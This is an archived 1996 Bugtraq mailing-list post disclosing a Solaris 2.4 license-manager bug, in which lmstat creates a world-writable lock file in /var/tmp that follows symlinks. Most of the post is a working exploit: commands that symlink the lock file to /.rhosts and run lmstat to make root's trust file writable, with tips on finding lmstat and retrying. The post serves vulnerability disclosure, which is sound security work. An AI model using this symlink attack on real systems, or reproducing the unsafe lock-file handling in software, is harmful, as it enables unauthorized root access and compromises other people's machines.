[3483] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

solaris 2.4 license-manager bug

daemon@ATHENA.MIT.EDU (Grant Kaufmann)
Wed Oct 16 21:48:31 1996

Date: 	Wed, 16 Oct 1996 23:46:07 +0200
Reply-To: Grant Kaufmann <gkaufman@cs.uct.ac.za>
From: Grant Kaufmann <gkaufman@cs.uct.ac.za>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>

Another bug for solaris 2.4
The license manager must be running, expect both
lmgrd.ste & suntechd to be somewhere in your process table.

/var/tmp/locksuntechd will be created by anyone who runs
lmstat, with perms 666 and quite happy to follow symlinks.
Anyway, here's the exploit.

-+-+-+ CUT
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
lmstat -c <insert your license file name here>

NOTES
lmstat could be anywhere on your filesystem. try /etc/opt/licenses
I found that sometimes this didn't work first time. It didn't create
the file. Just run lmstat again and it'll work.
-+-+-+

--
Grant
--
http://www.cs.uct.ac.za/~gkaufman/pgp.html


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[3483] in bugtraq

solaris 2.4 license-manager bug

daemon@ATHENA.MIT.EDU (Grant Kaufmann)Wed Oct 16 21:48:31 1996

daemon@ATHENA.MIT.EDU (Grant Kaufmann)
Wed Oct 16 21:48:31 1996